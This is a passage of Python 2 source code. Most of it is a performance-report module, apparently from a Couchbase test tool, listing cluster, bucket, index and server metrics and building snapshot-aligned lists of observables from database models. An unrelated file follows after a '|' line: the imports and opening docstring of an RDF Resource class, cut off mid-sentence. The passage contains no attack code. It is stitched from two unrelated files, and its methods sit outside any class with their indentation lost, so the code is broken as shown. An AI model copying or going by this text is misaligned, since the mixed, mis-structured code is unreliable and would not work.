"query_requests_5000ms",
"query_invalid_requests",
]),
("observe", [
"latency_observe",
]),
("durability", [
"latency_persist_to",
"latency_replicate_to",
]),
("fts_latency", [
"cbft_latency_get",
"elastic_latency_get",
"elastic_cache_hit",
"elastic_cache_size",
"elastic_filter_cache_size",
"elastic_active_search",
"elastic_query_total"
]),
("spring_latency", [
"latency_set",
"latency_get",
"latency_total_set",
"latency_total_get",
]),
("xdcr_stats", [
"changes_left",
"percent_completeness",
"docs_written",
"docs_filtered",
"docs_failed_cr_source",
"rate_replicated",
"bandwidth_usage",
"rate_doc_opt_repd",
"rate_doc_checks",
"wtavg_meta_latency",
"wtavg_docs_latency",
]),
("ns_server_system", [
"cpu_utilization",
]),
("ns_server", [
"ep_dcp_2i_items_sent",
"ep_dcp_2i_items_remaining",
"couch_views_ops",
"ops",
"cmd_get",
"cmd_set",
"delete_hits",
"cas_hits",
"xdc_ops",
"ep_num_ops_get_meta",
"ep_num_ops_set_meta",
"ep_num_ops_del_meta",
"curr_connections",
"curr_items",
"vb_replica_curr_items",
"vb_pending_curr_items",
"mem_used",
"ep_meta_data_memory",
"vb_active_resident_items_ratio",
"vb_replica_resident_items_ratio",
"ep_num_value_ejects",
"ep_tmp_oom_errors",
"ep_dcp_replica_items_remaining",
"ep_dcp_replica_total_bytes",
"ep_dcp_other_items_remaining",
"ep_dcp_other_total_bytes",
"disk_write_queue",
"ep_cache_miss_rate",
"ep_bg_fetched",
"ep_ops_create",
"vb_active_ops_create",
"vb_replica_ops_create",
"vb_pending_ops_create",
"ep_ops_update",
"vb_active_ops_update",
"vb_replica_ops_update",
"vb_pending_ops_update",
"ep_diskqueue_drain",
"ep_diskqueue_fill",
"ep_queue_size",
"avg_bg_wait_time",
"avg_disk_commit_time",
"avg_disk_update_time",
"vb_avg_total_queue_age",
"couch_docs_data_size",
"couch_docs_actual_disk_size",
"couch_views_data_size",
"couch_views_actual_disk_size",
"couch_total_disk_size",
"couch_docs_fragmentation",
"couch_views_fragmentation",
"cpu_utilization_rate",
"swap_used",
]),
("analytics", [
"heap_used",
"gc_count",
"gc_time",
"io_reads",
"io_writes",
"system_load_average",
"disk_used",
"thread_count",
]),
("fts_totals", [
"batch_merge_count",
"doc_count",
"iterator_next_count",
"iterator_seek_count",
"num_bytes_live_data",
"num_bytes_used_disk",
"num_files_on_disk",
"num_root_memorysegments",
"num_root_filesegments",
"num_mutations_to_index",
"num_pindexes",
"num_pindexes_actual",
"num_pindexes_target",
"num_recs_to_persist",
"reader_get_count",
"reader_multi_get_count",
"reader_prefix_iterator_count",
"reader_range_iterator_count",
"timer_batch_store_count",
"timer_data_delete_count",
"timer_data_update_count",
"timer_opaque_get_count",
"timer_opaque_set_count",
"timer_rollback_count",
"timer_snapshot_start_count",
"total_bytes_indexed",
"total_bytes_query_results",
"total_compactions",
"total_queries",
"total_queries_error",
"total_queries_slow",
"total_queries_timeout",
"total_request_time",
"total_term_searchers",
"writer_execute_batch_count",
"num_bytes_used_ram",
"pct_cpu_gc",
"total_gc",
]),
("fts_stats", [
"batch_merge_count",
"doc_count",
"iterator_next_count",
"iterator_seek_count",
"num_bytes_live_data",
"num_bytes_used_disk",
"num_files_on_disk",
"num_root_memorysegments",
"num_root_filesegments",
"num_mutations_to_index",
"num_pindexes",
"num_pindexes_actual",
"num_pindexes_target",
"num_recs_to_persist",
"reader_get_count",
"reader_multi_get_count",
"reader_prefix_iterator_count",
"reader_range_iterator_count",
"timer_batch_store_count",
"timer_data_delete_count",
"timer_data_update_count",
"timer_opaque_get_count",
"timer_opaque_set_count",
"timer_rollback_count",
"timer_snapshot_start_count",
"total_bytes_indexed",
"total_bytes_query_results",
"total_compactions",
"total_queries",
"total_queries_error",
"total_queries_slow",
"total_queries_timeout",
"total_request_time",
"total_term_searchers",
"writer_execute_batch_count",
"num_bytes_used_ram",
"pct_cpu_gc",
"total_gc",
]),
("eventing_stats", [
"DCP_MUTATION",
"DOC_TIMER_EVENTS",
"CRON_TIMER_EVENTS",
]),
("jts_stats", [
"jts_throughput",
"jts_latency",
]),
("eventing_per_node_stats", [
"DcpEventsRemaining",
]),
("eventing_per_handler_stats", [
"on_update_success"
]),
("eventing_consumer_stats", [
"eventing_consumer_rss",
"eventing_consumer_cpu",
]),
("secondary_stats", [
"index_items_count",
"index_num_docs_indexed",
"index_num_docs_pending",
"index_num_docs_queued",
"index_num_requests",
"index_num_rows_returned",
"index_scan_bytes_read",
"index_data_size",
"index_disk_size",
"index_fragmentation",
"index_total_scan_duration",
]),
("secondaryscan_latency", [
"Nth-latency",
]),
("secondary_debugstats", [
"num_connections",
"memory_used",
"memory_used_storage",
"memory_used_queue",
"average_indexer_resident_ratio"
]),
("secondary_debugstats_bucket", [
"mutation_queue_size",
"num_nonalign_ts",
"ts_queue_size",
]),
("secondary_debugstats_index", [
"avg_scan_latency",
"avg_scan_wait_latency",
"avg_ts_interval",
"avg_ts_items_count",
"disk_store_duration",
"flush_queue_size",
"num_compactions",
"num_completed_requests",
"num_rows_returned",
"num_rows_scanned_aggr",
"scan_cache_hit_aggr",
"timings_dcp_getseqs",
"timings_storage_commit",
"timings_storage_del",
"timings_storage_get",
"timings_storage_set",
"timings_storage_snapshot_create",
]),
("secondary_storage_stats", [
"MainStore_memory_size",
"MainStore_num_cached_pages",
"MainStore_num_pages",
"MainStore_num_pages_swapout",
"MainStore_num_pages_swapin",
"MainStore_bytes_incoming",
"MainStore_bytes_written",
"MainStore_write_amp",
"MainStore_lss_fragmentation",
"MainStore_cache_hits",
"MainStore_cache_misses",
"MainStore_cache_hit_ratio",
"MainStore_rcache_hits",
"MainStore_rcache_misses",
"MainStore_rcache_hit_ratio",
"MainStore_resident_ratio",
"MainStore_allocated",
"MainStore_freed",
"MainStore_reclaimed",
"MainStore_reclaim_pending",
"MainStore_mvcc_purge_ratio",
"MainStore_memory_quota",
"MainStore_lss_blk_read_bs",
"MainStore_lss_blk_gc_reads_bs",
"MainStore_lss_blk_rdr_reads_bs",
"MainStore_rlss_num_reads",
"MainStore_compressed_percent",
"MainStore_compressed_compressible_percent",
"MainStore_compress_cache_hit_ratio",
"MainStore_rcompress_cache_hit_ratio",
"MainStore_lss_cached_pages_percent",
"MainStore_num_burst_visits",
"MainStore_num_periodic_visits",
"MainStore_avg_throttle_dur_other",
"MainStore_avg_throttle_dur_reader",
"MainStore_avg_throttle_dur_writer",
"MainStore_inserts",
"MainStore_burst_eviction_rate",
"MainStore_periodic_eviction_rate",
"MainStore_eviction_rate_reader",
"MainStore_eviction_rate_writer",
"MainStore_eviction_rate_swapper",
"MainStore_eviction_rate_other",
"BackStore_memory_size",
"BackStore_num_cached_pages",
"BackStore_num_pages",
"BackStore_num_pages_swapout",
"BackStore_num_pages_swapin",
"BackStore_bytes_incoming",
"BackStore_bytes_written",
"BackStore_write_amp",
"BackStore_lss_fragmentation",
"BackStore_cache_hits",
"BackStore_cache_misses",
"BackStore_cache_hit_ratio",
"BackStore_rcache_hits",
"BackStore_rcache_misses",
"BackStore_rcache_hit_ratio",
"BackStore_resident_ratio",
"BackStore_allocated",
"BackStore_freed",
"BackStore_reclaimed",
"BackStore_reclaim_pending",
"BackStore_mvcc_purge_ratio",
"BackStore_lss_blk_read_bs",
"BackStore_lss_blk_gc_reads_bs",
"BackStore_lss_blk_rdr_reads_bs",
"BackStore_rlss_num_reads",
"BackStore_compressed_percent",
"BackStore_compressed_compressible_percent",
"BackStore_compress_cache_hit_ratio",
"BackStore_rcompress_cache_hit_ratio",
"BackStore_lss_cached_pages_percent",
"BackStore_num_burst_visits",
"BackStore_num_periodic_visits",
"BackStore_avg_throttle_dur_other",
"BackStore_avg_throttle_dur_reader",
"BackStore_avg_throttle_dur_writer",
"BackStore_inserts",
"BackStore_burst_eviction_rate",
"BackStore_periodic_eviction_rate",
"BackStore_eviction_rate_reader",
"BackStore_eviction_rate_writer",
"BackStore_eviction_rate_swapper",
"BackStore_eviction_rate_other",
]),
("secondary_storage_stats_mm", [
"mm_allocated",
"mm_resident",
"mm_metadata",
]),
("atop", [
"cbindex_cpu",
"cbindex_rss",
"cbindexperf_cpu",
"cbindexperf_rss",
"dcptest_rss",
"dcptest_cpu",
"cbbackupmgr_rss",
"cbbackupmgr_cpu",
"cbexport_rss",
"cbexport_cpu",
"cbimport_rss",
"cbimport_cpu",
"beam.smp_rss",
"beam.smp_cpu",
"memcached_rss",
"memcached_cpu",
"goxdcr_rss",
"goxdcr_cpu",
"indexer_rss",
"indexer_cpu",
"projector_rss",
"projector_cpu",
"cbq-engine_rss",
"cbq-engine_cpu",
"cbft_rss",
"cbft_cpu",
"eventing-produc_rss",
"eventing-produc_cpu",
"sync_gateway_cpu",
"sync_gateway_rss",
"sync_gateway_vsize",
"java_rss",
"java_cpu",
"cbc-pillowfight_rss",
"cbc-pillowfight_cpu",
"cblite_cpu",
"cblite_rss",
"cblite_vsize",
"prometheus_rss",
"prometheus_cpu",
]),
("sysdig", [
"indexer_pread",
"indexer_pwrite",
"memcached_pread",
"memcached_pwrite",
]),
("iostat", [
"tools_rbps",
"tools_wbps",
"tools_avgqusz",
"tools_util",
"data_rps",
"data_wps",
"data_rbps",
"data_wbps",
"data_avgqusz",
"data_util",
"index_rbps",
"index_wbps",
"index_avgqusz",
"index_util",
"analytics0_rbps",
"analytics0_wbps",
"analytics0_util",
"analytics1_rbps",
"analytics1_wbps",
"analytics1_util",
"analytics2_rbps",
"analytics2_wbps",
"analytics2_util",
"analytics3_rbps",
"analytics3_wbps",
"analytics3_util",
"analytics4_rbps",
"analytics4_wbps",
"analytics4_util",
]),
("disk", [
"data_bytes_read",
"data_bytes_written",
]),
("meminfo", [
"MemFree",
"Dirty",
"Buffers",
"Cached",
"SUnreclaim",
]),
("pcstat", [
"page_cache_hit_ratio",
"page_cache_total_hits",
"data_avg_page_cache_rr",
]),
("net", [
"in_bytes_per_sec",
"out_bytes_per_sec",
"ESTABLISHED",
"TIME_WAIT",
]),
("vmstat", [
"allocstall",
]),
("syncgateway_node_stats", [
"syncgateway__global__resource_utilization__process_cpu_percent_utilization",
"syncgateway__global__resource_utilization__process_memory_resident",
"syncgateway__global__resource_utilization__system_memory_total",
"syncgateway__global__resource_utilization__pub_net_bytes_sent",
"syncgateway__global__resource_utilization__pub_net_bytes_recv",
"syncgateway__global__resource_utilization__admin_net_bytes_sent",
"syncgateway__global__resource_utilization__admin_net_bytes_recv",
"syncgateway__global__resource_utilization__num_goroutines",
"syncgateway__global__resource_utilization__goroutines_high_watermark",
"syncgateway__global__resource_utilization__go_memstats_sys",
"syncgateway__global__resource_utilization__go_memstats_heapalloc",
"syncgateway__global__resource_utilization__go_memstats_heapidle",
"syncgateway__global__resource_utilization__go_memstats_heapinuse",
"syncgateway__global__resource_utilization__go_memstats_heapreleased",
"syncgateway__global__resource_utilization__go_memstats_stackinuse",
"syncgateway__global__resource_utilization__go_memstats_stacksys",
"syncgateway__global__resource_utilization__go_memstats_pausetotalns",
"syncgateway__global__resource_utilization__error_count",
"syncgateway__global__resource_utilization__warn_count",
"syncgateway__per_db__db__cache__rev_cache_hits",
"syncgateway__per_db__db__cache__rev_cache_misses",
"syncgateway__per_db__db__cache__rev_cache_bypass",
"syncgateway__per_db__db__cache__chan_cache_hits",
"syncgateway__per_db__db__cache__chan_cache_misses",
"syncgateway__per_db__db__cache__chan_cache_active_revs",
"syncgateway__per_db__db__cache__chan_cache_tombstone_revs",
"syncgateway__per_db__db__cache__chan_cache_removal_revs",
"syncgateway__per_db__db__cache__chan_cache_num_channels",
"syncgateway__per_db__db__cache__chan_cache_max_entries",
"syncgateway__per_db__db__cache__chan_cache_pending_queries",
"syncgateway__per_db__db__cache__chan_cache_channels_added",
"syncgateway__per_db__db__cache__chan_cache_channels_evicted_inactive",
"syncgateway__per_db__db__cache__chan_cache_channels_evicted_nru",
"syncgateway__per_db__db__cache__chan_cache_compact_count",
"syncgateway__per_db__db__cache__chan_cache_compact_time",
"syncgateway__per_db__db__cache__num_active_channels",
"syncgateway__per_db__db__cache__num_skipped_seqs",
"syncgateway__per_db__db__cache__abandoned_seqs",
"syncgateway__per_db__db__cache__high_seq_cached",
"syncgateway__per_db__db__cache__high_seq_stable",
"syncgateway__per_db__db__cache__skipped_seq_len",
"syncgateway__per_db__db__cache__pending_seq_len",
"syncgateway__per_db__db__database__sequence_get_count",
"syncgateway__per_db__db__database__sequence_incr_count",
"syncgateway__per_db__db__database__sequence_reserved_count",
"syncgateway__per_db__db__database__sequence_assigned_count",
"syncgateway__per_db__db__database__sequence_released_count",
"syncgateway__per_db__db__database__crc32c_match_count",
"syncgateway__per_db__db__database__num_replications_active",
"syncgateway__per_db__db__database__num_replications_total",
"syncgateway__per_db__db__database__num_doc_writes",
"syncgateway__per_db__db__database__num_tombstones_compacted",
"syncgateway__per_db__db__database__doc_writes_bytes",
"syncgateway__per_db__db__database__doc_writes_xattr_bytes",
"syncgateway__per_db__db__database__num_doc_reads_rest",
"syncgateway__per_db__db__database__num_doc_reads_blip",
"syncgateway__per_db__db__database__doc_writes_bytes_blip",
"syncgateway__per_db__db__database__doc_reads_bytes_blip",
"syncgateway__per_db__db__database__warn_xattr_size_count",
"syncgateway__per_db__db__database__warn_channels_per_doc_count",
"syncgateway__per_db__db__database__warn_grants_per_doc_count",
"syncgateway__per_db__db__database__dcp_received_count",
"syncgateway__per_db__db__database__high_seq_feed",
"syncgateway__per_db__db__database__dcp_received_time",
"syncgateway__per_db__db__database__dcp_caching_count",
"syncgateway__per_db__db__database__dcp_caching_time",
"syncgateway__per_db__db__delta_sync__deltas_requested",
"syncgateway__per_db__db__delta_sync__deltas_sent",
"syncgateway__per_db__db__delta_sync__delta_pull_replication_count",
"syncgateway__per_db__db__delta_sync__delta_cache_hit",
"syncgateway__per_db__db__delta_sync__delta_cache_miss",
"syncgateway__per_db__db__delta_sync__delta_push_doc_count",
"syncgateway__per_db__db__shared_bucket_import__import_count",
"syncgateway__per_db__db__shared_bucket_import__import_cancel_cas",
"syncgateway__per_db__db__shared_bucket_import__import_error_count",
"syncgateway__per_db__db__shared_bucket_import__import_processing_time",
"syncgateway__per_db__db__cbl_replication_push__doc_push_count",
"syncgateway__per_db__db__cbl_replication_push__write_processing_time",
"syncgateway__per_db__db__cbl_replication_push__sync_function_time",
"syncgateway__per_db__db__cbl_replication_push__sync_function_count",
"syncgateway__per_db__db__cbl_replication_push__propose_change_time",
"syncgateway__per_db__db__cbl_replication_push__propose_change_count",
"syncgateway__per_db__db__cbl_replication_push__attachment_push_count",
"syncgateway__per_db__db__cbl_replication_push__attachment_push_bytes",
"syncgateway__per_db__db__cbl_replication_push__conflict_write_count",
"syncgateway__per_db__db__cbl_replication_pull__num_pull_repl_active_one_shot",
"syncgateway__per_db__db__cbl_replication_pull__num_pull_repl_active_continuous",
"syncgateway__per_db__db__cbl_replication_pull__num_pull_repl_total_one_shot",
"syncgateway__per_db__db__cbl_replication_pull__num_pull_repl_total_continuous",
"syncgateway__per_db__db__cbl_replication_pull__num_pull_repl_since_zero",
"syncgateway__per_db__db__cbl_replication_pull__num_pull_repl_caught_up",
"syncgateway__per_db__db__cbl_replication_pull__request_changes_count",
"syncgateway__per_db__db__cbl_replication_pull__request_changes_time",
"syncgateway__per_db__db__cbl_replication_pull__rev_send_count",
"syncgateway__per_db__db__cbl_replication_pull__rev_send_latency",
"syncgateway__per_db__db__cbl_replication_pull__rev_processing_time",
"syncgateway__per_db__db__cbl_replication_pull__max_pending",
"syncgateway__per_db__db__cbl_replication_pull__attachment_pull_count",
"syncgateway__per_db__db__cbl_replication_pull__attachment_pull_bytes",
"syncgateway__per_db__db__security__num_docs_rejected",
"syncgateway__per_db__db__security__num_access_errors",
"syncgateway__per_db__db__security__auth_success_count",
"syncgateway__per_db__db__security__auth_failed_count",
"syncgateway__per_db__db__security__total_auth_time",
"syncGateway_import__import_count",
"syncgateway__per_db__db__gsi_views__access_count",
"syncgateway__per_db__db__gsi_views__roleAccess_count",
"syncgateway__per_db__db__gsi_views__channels_count",
]),
("syncgateway_cluster_stats", [
"syncgateway__global__resource_utilization__process_cpu_percent_utilization",
"syncgateway__global__resource_utilization__process_memory_resident",
"syncgateway__global__resource_utilization__system_memory_total",
"syncgateway__global__resource_utilization__pub_net_bytes_sent",
"syncgateway__global__resource_utilization__pub_net_bytes_recv",
"syncgateway__global__resource_utilization__admin_net_bytes_sent",
"syncgateway__global__resource_utilization__admin_net_bytes_recv",
"syncgateway__global__resource_utilization__num_goroutines",
"syncgateway__global__resource_utilization__goroutines_high_watermark",
"syncgateway__global__resource_utilization__go_memstats_sys",
"syncgateway__global__resource_utilization__go_memstats_heapalloc",
"syncgateway__global__resource_utilization__go_memstats_heapidle",
"syncgateway__global__resource_utilization__go_memstats_heapinuse",
"syncgateway__global__resource_utilization__go_memstats_heapreleased",
"syncgateway__global__resource_utilization__go_memstats_stackinuse",
"syncgateway__global__resource_utilization__go_memstats_stacksys",
"syncgateway__global__resource_utilization__go_memstats_pausetotalns",
"syncgateway__global__resource_utilization__error_count",
"syncgateway__global__resource_utilization__warn_count",
"syncgateway__per_db__db__cache__rev_cache_hits",
"syncgateway__per_db__db__cache__rev_cache_misses",
"syncgateway__per_db__db__cache__rev_cache_bypass",
"syncgateway__per_db__db__cache__chan_cache_hits",
"syncgateway__per_db__db__cache__chan_cache_misses",
"syncgateway__per_db__db__cache__chan_cache_active_revs",
"syncgateway__per_db__db__cache__chan_cache_tombstone_revs",
"syncgateway__per_db__db__cache__chan_cache_removal_revs",
"syncgateway__per_db__db__cache__chan_cache_num_channels",
"syncgateway__per_db__db__cache__chan_cache_max_entries",
"syncgateway__per_db__db__cache__chan_cache_pending_queries",
"syncgateway__per_db__db__cache__chan_cache_channels_added",
"syncgateway__per_db__db__cache__chan_cache_channels_evicted_inactive",
"syncgateway__per_db__db__cache__chan_cache_channels_evicted_nru",
"syncgateway__per_db__db__cache__chan_cache_compact_count",
"syncgateway__per_db__db__cache__chan_cache_compact_time",
"syncgateway__per_db__db__cache__num_active_channels",
"syncgateway__per_db__db__cache__num_skipped_seqs",
"syncgateway__per_db__db__cache__abandoned_seqs",
"syncgateway__per_db__db__cache__high_seq_cached",
"syncgateway__per_db__db__cache__high_seq_stable",
"syncgateway__per_db__db__cache__skipped_seq_len",
"syncgateway__per_db__db__cache__pending_seq_len",
"syncgateway__per_db__db__database__sequence_get_count",
"syncgateway__per_db__db__database__sequence_incr_count",
"syncgateway__per_db__db__database__sequence_reserved_count",
"syncgateway__per_db__db__database__sequence_assigned_count",
"syncgateway__per_db__db__database__sequence_released_count",
"syncgateway__per_db__db__database__crc32c_match_count",
"syncgateway__per_db__db__database__num_replications_active",
"syncgateway__per_db__db__database__num_replications_total",
"syncgateway__per_db__db__database__num_doc_writes",
"syncgateway__per_db__db__database__num_tombstones_compacted",
"syncgateway__per_db__db__database__doc_writes_bytes",
"syncgateway__per_db__db__database__doc_writes_xattr_bytes",
"syncgateway__per_db__db__database__num_doc_reads_rest",
"syncgateway__per_db__db__database__num_doc_reads_blip",
"syncgateway__per_db__db__database__doc_writes_bytes_blip",
"syncgateway__per_db__db__database__doc_reads_bytes_blip",
"syncgateway__per_db__db__database__warn_xattr_size_count",
"syncgateway__per_db__db__database__warn_channels_per_doc_count",
"syncgateway__per_db__db__database__warn_grants_per_doc_count",
"syncgateway__per_db__db__database__dcp_received_count",
"syncgateway__per_db__db__database__high_seq_feed",
"syncgateway__per_db__db__database__dcp_received_time",
"syncgateway__per_db__db__database__dcp_caching_count",
"syncgateway__per_db__db__database__dcp_caching_time",
"syncgateway__per_db__db__delta_sync__deltas_requested",
"syncgateway__per_db__db__delta_sync__deltas_sent",
"syncgateway__per_db__db__delta_sync__delta_pull_replication_count",
"syncgateway__per_db__db__delta_sync__delta_cache_hit",
"syncgateway__per_db__db__delta_sync__delta_cache_miss",
"syncgateway__per_db__db__delta_sync__delta_push_doc_count",
"syncgateway__per_db__db__shared_bucket_import__import_count",
"syncgateway__per_db__db__shared_bucket_import__import_cancel_cas",
"syncgateway__per_db__db__shared_bucket_import__import_error_count",
"syncgateway__per_db__db__shared_bucket_import__import_processing_time",
"syncgateway__per_db__db__cbl_replication_push__doc_push_count",
"syncgateway__per_db__db__cbl_replication_push__write_processing_time",
"syncgateway__per_db__db__cbl_replication_push__sync_function_time",
"syncgateway__per_db__db__cbl_replication_push__sync_function_count",
"syncgateway__per_db__db__cbl_replication_push__propose_change_time",
"syncgateway__per_db__db__cbl_replication_push__propose_change_count",
"syncgateway__per_db__db__cbl_replication_push__attachment_push_count",
"syncgateway__per_db__db__cbl_replication_push__attachment_push_bytes",
"syncgateway__per_db__db__cbl_replication_push__conflict_write_count",
"syncgateway__per_db__db__cbl_replication_pull__num_pull_repl_active_one_shot",
"syncgateway__per_db__db__cbl_replication_pull__num_pull_repl_active_continuous",
"syncgateway__per_db__db__cbl_replication_pull__num_pull_repl_total_one_shot",
"syncgateway__per_db__db__cbl_replication_pull__num_pull_repl_total_continuous",
"syncgateway__per_db__db__cbl_replication_pull__num_pull_repl_since_zero",
"syncgateway__per_db__db__cbl_replication_pull__num_pull_repl_caught_up",
"syncgateway__per_db__db__cbl_replication_pull__request_changes_count",
"syncgateway__per_db__db__cbl_replication_pull__request_changes_time",
"syncgateway__per_db__db__cbl_replication_pull__rev_send_count",
"syncgateway__per_db__db__cbl_replication_pull__rev_send_latency",
"syncgateway__per_db__db__cbl_replication_pull__rev_processing_time",
"syncgateway__per_db__db__cbl_replication_pull__max_pending",
"syncgateway__per_db__db__cbl_replication_pull__attachment_pull_count",
"syncgateway__per_db__db__cbl_replication_pull__attachment_pull_bytes",
"syncgateway__per_db__db__security__num_docs_rejected",
"syncgateway__per_db__db__security__num_access_errors",
"syncgateway__per_db__db__security__auth_success_count",
"syncgateway__per_db__db__security__auth_failed_count",
"syncgateway__per_db__db__security__total_auth_time",
"syncGateway_import__import_count",
"syncgateway__per_db__db__gsi_views__access_count",
"syncgateway__per_db__db__gsi_views__roleAccess_count",
"syncgateway__per_db__db__gsi_views__channels_count",
]),
))
def __init__(self, snapshots):
    """As part of initialization prefetch list of buckets and servers in
    order to reduce number of SQL queries. Also store list of snapshots.

    Only entities (bucket names, index names, server addresses) common to
    *every* snapshot's cluster are kept, via set intersection.

    :param snapshots: iterable of snapshot model objects.
    """
    self.snapshots = snapshots
    self.buckets = ()
    self.servers = ()
    self.indexes = ()

    def _intersect(current, new_names):
        # () is the "not initialized yet" sentinel; afterwards keep only
        # the names present in every cluster seen so far.
        return new_names if current == () else new_names & current

    for snapshot in snapshots:
        buckets = {
            b.name for b in models.Bucket.objects.filter(cluster=snapshot.cluster)
        }
        self.buckets = _intersect(self.buckets, buckets)
        indexes = {
            i.name for i in models.Index.objects.filter(cluster=snapshot.cluster)
        }
        self.indexes = _intersect(self.indexes, indexes)
        servers = {
            s.address for s in models.Server.objects.filter(cluster=snapshot.cluster)
        }
        self.servers = _intersect(self.servers, servers)
def get_observables(self):
    """Get all stored in database Observable objects that match provided
    snapshots. There are four expensive queries per snapshot:
    -- get all cluster-wide metrics
    -- get all per-bucket metrics
    -- get all per-index metrics
    -- get all per-server metrics
    That was the only obvious way to achieve O(n) time complexity.
    all_observables is the nested dictionary where every object may be
    queried as:
    all_observables[server or ""][bucket/index/server or ""][cluster][collector][name]
    It's allowed to use "" for bucket names and server addresses.
    Every model object is converted to extended named tuple.
    """
    all_observables = defaultdict(dict)
    # "" is the top-level key for everything that is not per-server-per-bucket.
    all_observables[""] = defaultdict(dict)
    for snapshot in self.snapshots:
        # Cluster-wide metrics: rows with no bucket, server or index attached.
        observables = defaultdict(dict)
        for o in models.Observable.objects.filter(cluster=snapshot.cluster,
                                                  bucket__isnull=True,
                                                  server__isnull=True,
                                                  index__isnull=True):
            observables[o.collector][o.name] = Observable(
                snapshot.cluster.name, "", "", "", o.name, o.collector
            )
        all_observables[""][""][snapshot.cluster] = observables
        # Per-bucket metrics
        for bucket in self.buckets:
            _bucket = models.Bucket.objects.get(cluster=snapshot.cluster,
                                                name=bucket)
            observables = defaultdict(dict)
            for o in models.Observable.objects.filter(cluster=snapshot.cluster,
                                                      bucket=_bucket,
                                                      server__isnull=True,
                                                      index__isnull=True):
                observables[o.collector][o.name] = Observable(
                    snapshot.cluster.name, "", bucket, "", o.name, o.collector
                )
            all_observables[""][bucket][snapshot.cluster] = observables
        # Per-index metrics
        # NOTE(review): buckets, indexes and servers share the same second-level
        # dict keyed by name; a bucket and an index with the same name would
        # collide — presumably names never clash in practice, confirm.
        for index in self.indexes:
            _index = models.Index.objects.get(cluster=snapshot.cluster,
                                              name=index)
            observables = defaultdict(dict)
            for o in models.Observable.objects.filter(cluster=snapshot.cluster,
                                                      bucket__isnull=True,
                                                      server__isnull=True,
                                                      index=_index):
                observables[o.collector][o.name] = Observable(
                    snapshot.cluster.name, "", "", index, o.name, o.collector
                )
            all_observables[""][index][snapshot.cluster] = observables
        # Per-server metrics
        for server in self.servers:
            _server = models.Server.objects.get(cluster=snapshot.cluster,
                                                address=server)
            observables = defaultdict(dict)
            for o in models.Observable.objects.filter(cluster=snapshot.cluster,
                                                      bucket__isnull=True,
                                                      server=_server,
                                                      index__isnull=True):
                observables[o.collector][o.name] = Observable(
                    snapshot.cluster.name, server, "", "", o.name, o.collector
                )
            all_observables[""][server][snapshot.cluster] = observables
        # Per-server Per-Bucket metrics (e.g. eventing consumer stats)
        for server in self.servers:
            if server not in all_observables:
                all_observables[server] = defaultdict(dict)
            for bucket in self.buckets:
                # NOTE(review): the _server lookup could be hoisted out of the
                # bucket loop; kept in place to preserve exact query order.
                _server = models.Server.objects.get(cluster=snapshot.cluster,
                                                    address=server)
                _bucket = models.Bucket.objects.get(cluster=snapshot.cluster,
                                                    name=bucket)
                observables = defaultdict(dict)
                for o in models.Observable.objects.filter(cluster=snapshot.cluster,
                                                          bucket=_bucket,
                                                          server=_server,
                                                          index__isnull=True):
                    observables[o.collector][o.name] = Observable(
                        snapshot.cluster.name, server, bucket, "", o.name, o.collector
                    )
                all_observables[server][bucket][snapshot.cluster] = observables
    return all_observables
def get_report(self):
    """Primary class method that returns a tuple of snapshot-aligned lists
    of Observable objects (one list per metric/entity combination).

    Lists where the metric is missing for every snapshot are dropped.
    A collector may legitimately appear in several of the scope checks
    below (e.g. "sgimport_latency"): its metrics are then collected at
    each applicable scope.
    """
    all_observables = self.get_observables()
    observables = []
    for collector, metrics in self.METRICS.iteritems():  # NOTE: Python 2 dict API
        # Cluster-wide metrics
        if collector in ("active_tasks",
                         "ns_server",
                         "n1ql_stats",
                         "fts_totals",
                         "fts_latency",
                         "secondary_debugstats",
                         "secondaryscan_latency",
                         "secondary_storage_stats_mm",
                         "syncgateway_cluster_stats",
                         "sgimport_latency",
                         ):
            for metric in metrics:
                # One entry per metric: the same metric across all snapshots.
                observables.append([
                    all_observables[""][""][snapshot.cluster][collector].get(metric)
                    for snapshot in self.snapshots
                ])
        # Per-server metrics
        if collector in ("atop",
                         "analytics",
                         "disk",
                         "iostat",
                         "net",
                         "fts_stats",
                         "meminfo",
                         "pcstat",
                         "sysdig",
                         "ns_server_system",
                         "syncgateway_node_stats",
                         "eventing_per_node_stats",
                         "sgimport_latency",
                         "vmstat",
                         ):
            for metric in metrics:
                for server in self.servers:
                    observables.append([
                        all_observables[""][server][snapshot.cluster][collector].get(metric)
                        for snapshot in self.snapshots
                    ])
        # Per-bucket metrics
        if collector in ("active_tasks",
                         "xdcr_stats",
                         "ns_server",
                         "spring_latency",
                         "spring_query_latency",
                         "durability",
                         "observe",
                         "xdcr_lag",
                         "secondary_stats",
                         "secondary_debugstats_bucket",
                         "eventing_stats",
                         "jts_stats",
                         "sgimport_latency",
                         "kvstore_stats",
                         "eventing_per_handler_stats",
                         "cbstats_memory",
                         "cbstats_all",
                         ):
            for metric in metrics:
                for bucket in self.buckets:
                    observables.append([
                        all_observables[""][bucket][snapshot.cluster][collector].get(metric)
                        for snapshot in self.snapshots
                    ])
        # Per-index metrics
        if collector in ("secondary_debugstats_index",
                         "secondary_storage_stats",
                         ):
            for metric in metrics:
                for index in self.indexes:
                    observables.append([
                        all_observables[""][index][snapshot.cluster][collector].get(metric)
                        for snapshot in self.snapshots
                    ])
        # Per-server, Per-bucket metrics
        if collector in ("eventing_consumer_stats",
                         ):
            for metric in metrics:
                for server in self.servers:
                    for bucket in self.buckets:
                        # Guard: this nesting level only exists for entities
                        # that actually had observables.
                        if bucket in all_observables[server]:
                            observables.append([
                                all_observables[server][bucket][snapshot.cluster][collector].get(metric)
                                for snapshot in self.snapshots
                                if snapshot.cluster in all_observables[server][bucket]
                            ])
    # Skip full mismatch and return tuple with Observable objects
    return tuple(_ for _ in observables if set(_) != {None})
|
|
from functools import partial
from urlparse import urlparse
import logging
import json
from types import GeneratorType
from rdflib import URIRef, Graph, RDF
from oldman.exception import OMUnauthorizedTypeChangeError, OMInternalError, OMUserError
from oldman.exception import OMAttributeAccessError, OMUniquenessError, OMWrongResourceError, OMEditError
from oldman.common import OBJECT_PROPERTY
class Resource(object):
"""A :class:`~oldman.resource.resource.Resource` object is a subject-centric representation of a Web resource.
A set of :class:`~oldman.resource.resource.Resource` objects is equivalent to a RDF graph.
In RDF, a resource is identified by an IRI (globally) or a blank node (locally).
Because blank node support is complex and limited (:class:`rdflib.plugins.stores.sparqlstore.SPARQLStore`
stores do not support them), **every** :class:`~oldman.resource.Resource` **object has an IRI**.
This IRI is either given or generated by a :class:`~oldman.iri.IriGenerator` object.
Some generators generate recognizable `skolem IRIs
<http://www.w3.org/TR/2014/REC-rdf11-concepts-20140225/#section-skolemization>`_
that are treated as blank nodes when the resource is serialized into JSON, JSON-LD
